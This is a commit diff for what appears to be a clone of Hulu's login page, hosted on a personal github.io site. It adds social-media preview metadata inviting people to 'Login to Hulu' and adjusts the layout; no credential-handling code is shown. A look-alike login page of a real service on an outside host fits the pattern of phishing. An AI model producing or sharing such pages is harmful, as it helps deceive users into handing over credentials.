Initial commit of Hulu project

--- a/Hulu.html
+++ b/Hulu.html
@@ -4,6 +4,17 @@
     <meta charset="UTF-8">
     <meta name="viewport" content="width=device-width, initial-scale=1.0">
     <title>Hulu Login | Hulu</title>
+    <meta property="og:title" content="Hulu Login Page">
+    <meta property="og:description" content="Login to Hulu to watch your favorite shows!">
+    <meta property="og:image" content="https://louise2003-gg.github.io/Hulu-Login-Hulu/thumbnail.png">
+    <meta property="og:url" content="https://louise2003-gg.github.io/Hulu-Login-Hulu/Hulu.html">
+    <meta property="og:type" content="website">
+
+    <meta name="twitter:card" content="summary_large_image">
+    <meta name="twitter:title" content="Hulu Login Page">
+    <meta name="twitter:description" content="Login to Hulu to watch your favorite shows!">
+    <meta name="twitter:image" content="https://louise2003-gg.github.io/Hulu-Login-Hulu/thumbnail.png">
+
     <script src="https://cdn.jsdelivr.net/npm/@tailwindcss/browser@4"></script>
     <link rel="shortcut icon" href="//assetshuluimcom-a.akamaihd.net/h3o/icons/favicon.ico.png" type="image/vnd.microsoft.icon" class="jsx-533771383">
     <script src="https://cdn.jsdelivr.net/npm/@tailwindcss/browser@4"></script>
@@ -18,7 +29,7 @@
         </svg>
     </div>
 
-    <div class="bg-white border-2 w-[38.70%] h-[75%] flex flex-col items-start justify-start rounded-3xl">
+    <div class="bg-white border-2 w-[42.90%] h-[75%] flex flex-col items-start justify-start rounded-3xl ">
 
         <div class="flex items-start justify-start w-[16.50%] mt-14 ml-18 ">
 
@@ -60,8 +71,8 @@
             </svg>
         </div>
 
-        <div class="w-[77%] h-25 mt-2 ml-18 ">
-            <h1 class="text-3xl text-gray-800 font-semibold text-black mb-2">
+        <div class="w-[79%] h-25 mt-2 ml-18 ">
+            <h1 class="text-[28px] text-gray-800 font-semibold text-black mb-2">
               Enter your email to continue
             </h1>
 
